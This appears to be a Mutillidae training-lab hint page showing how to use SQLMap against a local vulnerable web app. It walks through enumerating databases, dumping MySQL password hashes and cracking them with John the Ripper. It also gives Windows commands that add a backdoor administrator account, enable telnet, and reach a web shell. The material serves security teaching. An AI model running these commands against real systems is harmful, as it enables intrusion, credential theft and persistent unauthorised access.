SQL Injection with SQLMap


Overview

Note: See the SQL injection hint page for help specific to SQL injection. This page is dedicated to the tool SQLMap which can be helpful to evaluate the risk exposed by SQL injection vulnerabilities.

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws. It is widely considered the best open-source SQL injection testing tool available.

Running SQLMAP Help

Note: On Kali Linux, SQLMap is found in /usr/share/sqlmap/

sqlmap --help Help
sqlmap -hh Double the help

Running SQLMAP "Manually"

sqlmap.py --url="http://192.168.56.102/mutillidae/index.php?page=login.php" --data="username=asdf&password=asdf&login-php-submit-button=Login" --banner

Capturing Request To Pass To SQLMAP

Create a valid HTTP request on the target page. Do not inject malicious input into this request. For example, using Burp-Suite Capture the request in Burp-Proxy --> Intercept or lookup request in Burp-Proxy --> HTTP History.

Copy the HTTP request and save to a text file. gedit is a reasonable editor. Save request to a file such as ~/engagements/sqlmap/login.php.request. The -r switch takes the file path.

Here is a sample request for URL: http://192.168.56.102/mutillidae/index.php?page=login.php

Request:
POST /mutillidae/index.php?page=login.php HTTP/1.1 Host: 192.168.56.102 User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:17.0) Gecko/20100101 Firefox/17.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.56.102/mutillidae/index.php?page=login.php Cookie: showhints=0; PHPSESSID=fik978dbhcujcgdjfc2lg249r4 Content-Type: application/x-www-form-urlencoded Content-Length: 57 username=asdf&password=asdf&login-php-submit-button=Login
Running SQLMAP with "auto-parse"

Start sqlmap telling sqlmap path to file containing HTTP request. Attempting to enumerate database server information is a good start (--banner). SQLMap will parse URL and input parameters then attempt to determine database brand and injection points.

sqlmap -r ~/engagements/sqlmap/login.php.request <options>

sqlmap may find SQL injection automatically. But performing recon and initial testing on application can greatly enhance chance of success. Fingerprint database and inform SQLMap with --dbms parameter. Determine likely parameter and tell SQLMap with -p parameter.

Example: sqlmap -r /tmp/request -p username --dbms=MySQL --banner

Once a vulnerable parameter identified begin to enumerate data structures

Databases

--dbs

Tables in databases

--tables

Columns in tables

--columns

Feed each piece of information discovered into next round of testing

Once target information located, extract information with --dump. SQLMap can perform many other attacks depending on the privileges allocated to the application ID

Running SQLMAP with various features

sqlmap -r ~/engagements/sqlmap/login.php.request <options>
--banner web server operating system: Windows web application technology: PHP 5.4.4, Apache 2.4.2 back-end DBMS: MySQL 5.0 banner: '5.5.25a' --fingerprint web server operating system: Windows web application technology: PHP 5.4.4, Apache 2.4.2 back-end DBMS: active fingerprint: MySQL >= 5.5.0 --current-user Retrieve DBMS current user --current-db Retrieve DBMS current database --hostname Retrieve DBMS server hostname --is-dba Detect if the DBMS current user is DBA current user: 'root@localhost' current database: 'nowasp' current user is DBA: True hostname: 'mutillid-7se1xr' --users Enumerate DBMS users --passwords Enumerate DBMS users password hashes database management system users [*] ''@'localhost' [*] 'pma'@'localhost' [*] 'root'@'linux' [*] 'root'@'localhost' --dbs Enumerate DBMS databases available databases[10]: [*] cdcol [*] information_schema [*] mysql [*] nowasp [*] owasp10 [*] owasp13 [*] performance_schema [*] phpmyadmin [*] test [*] webauth

Enumerate DBMS database tables, columns, structure (schema)
--tables Enumerate DBMS database tables --columns Enumerate DBMS database table columns --schema Enumerate DBMS schema --count Retrieve number of entries for table(s) --exclude-sysdbs Exclude DBMS system databases when enumerating tables -D DB DBMS database to enumerate -T TBL DBMS database table to enumerate -C COL DBMS database table column to enumerate -U USER DBMS user to enumerate

Extracting data

--dump Dump DBMS database table entries --dump-all Dump all DBMS databases tables entries -D DB DBMS database to enumerate -T TBL DBMS database table to enumerate -C COL DBMS database table column to enumerate -U USER DBMS user to enumerate --exclude-sysdbs Exclude DBMS system databases when enumerating tables --start=LIMITSTART First query output entry to retrieve --stop=LIMITSTOP Last query output entry to retrieve --sql-query=QUERY SQL statement to be executed --sql-shell Prompt for an interactive SQL shell

Listing columns from tables

sqlmap -r ~/engagements/sqlmap/login.php.request -D mysql -T user --columns sqlmap -r ~/engagements/sqlmap/login.php.request -D mysql -T user --common-columns sqlmap -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select column_name from information_schema.columns where table_name = 'user'" select column_name from information_schema.columns where table_name = 'user' [42]: [*] Alter_priv [*] Alter_routine_priv [*] authentication_string [*] Create_priv [*] Create_routine_priv [*] Create_tablespace_priv [*] Create_tmp_table_priv [*] Create_user_priv [*] Create_view_priv [*] Delete_priv [*] Drop_priv [*] Event_priv [*] Execute_priv [*] File_priv [*] Grant_priv [*] Host [*] Index_priv [*] Insert_priv [*] Lock_tables_priv [*] max_connections [*] max_questions [*] max_updates [*] max_user_connections [*] Password [*] plugin [*] Process_priv [*] References_priv [*] Reload_priv [*] Repl_client_priv [*] Repl_slave_priv [*] Select_priv [*] Show_db_priv [*] Show_view_priv [*] Shutdown_priv [*] ssl_cipher [*] ssl_type [*] Super_priv [*] Trigger_priv [*] Update_priv [*] User [*] x509_issuer [*] x509_subject

Advanced: Modifying injections

SELECT * FROM accounts WHERE username='' AND password=''' sqlmap -r ~/engagements/sqlmap/login.php.request --prefix="SELECT * FROM accounts WHERE username='" --suffix="'-- " --banner --prefix=PREFIX Injection payload prefix string --suffix=SUFFIX Injection payload suffix string

Advanced: Dealing with inconsistent results

select User, Password from mysql.user versus sqlmap -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select User, Password from mysql.user order by User desc" select User, Password from mysql.user order by User desc select User, Password, Host, authentication_string from mysql.user order by User desc [9]: [*] root, , localhost, [*] root, , linux, [*] pma, , localhost, [*] Simba, *F43B942A34347297C3B0455DAB190AFB9BBF13B5, localhost, [*] Rocky, *2BA8DF85753BE61F6C72A8784B11E68A41878032, localhost, [*] Patches, *2027D9391E714343187E07ACB41AE8925F30737E, localhost, [*] Happy, *160E7D8EE3A97BED0F0AD1563BFB619178D15D7B, localhost, [*] , , localhost, [*] , , linux,

Cracking MySQL Password Hashes

John the Ripper Command Line /pentest/passwords/john/john --format=mysql-sha1 /tmp/mysql.hashes Password Hashes in MySQL Format Simba:*F43B942A34347297C3B0455DAB190AFB9BBF13B5 Rocky:*2BA8DF85753BE61F6C72A8784B11E68A41878032 Patches:*2027D9391E714343187E07ACB41AE8925F30737E Happy:*160E7D8EE3A97BED0F0AD1563BFB619178D15D7B

Understanding sqlmap O/S Shell

View transaction: tcpdump -i eth1 -vvv -X 1st Stage Uploader 2nd Stage Command Shell Page sc query state= all sc query tlntsvr sc config tlntsvr start= demand sc start tlntsvr net user root toor /add net localgroup TelnetClients /add net localgroup Administrators root /add net localgroup TelnetClients root /add netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=192.168.56.101

Interacting Directly with sqlmap O/S Shell Backdoor

http://192.168.56.102/<temp file name>?cmd=ping%20192.168.56.101

Direct connection to the database

Installing Py-MySQL Dependency git clone https://github.com/petehunt/PyMySQL/ cd PyMySQL python setup.py install cd .. rm -rf PyMySQL sqlmap -d mysql://root:""@192.168.56.102:5123/nowasp

Videos


Click here to watch Automate SQL Injection using sqlmap
Click here to watch SQL Injection Explained - Part 6: Timing Attacks
Click here to watch SQL Injection Explained - Part 5: Union-Based SQL Injection
Click here to watch SQL Injection Explained - Part 9: Inserting Data
Click here to watch SQL Injection Explained - Part 10: Web Shells
Click here to watch SQL Injection Explained - Part 7: Reading Files
Click here to watch Basics of using sqlmap - ISSA KY Workshop - February 2013
Click here to watch Introduction to SQL Injection for Beginners
Click here to watch Introduction to SQL Injection with SQLMap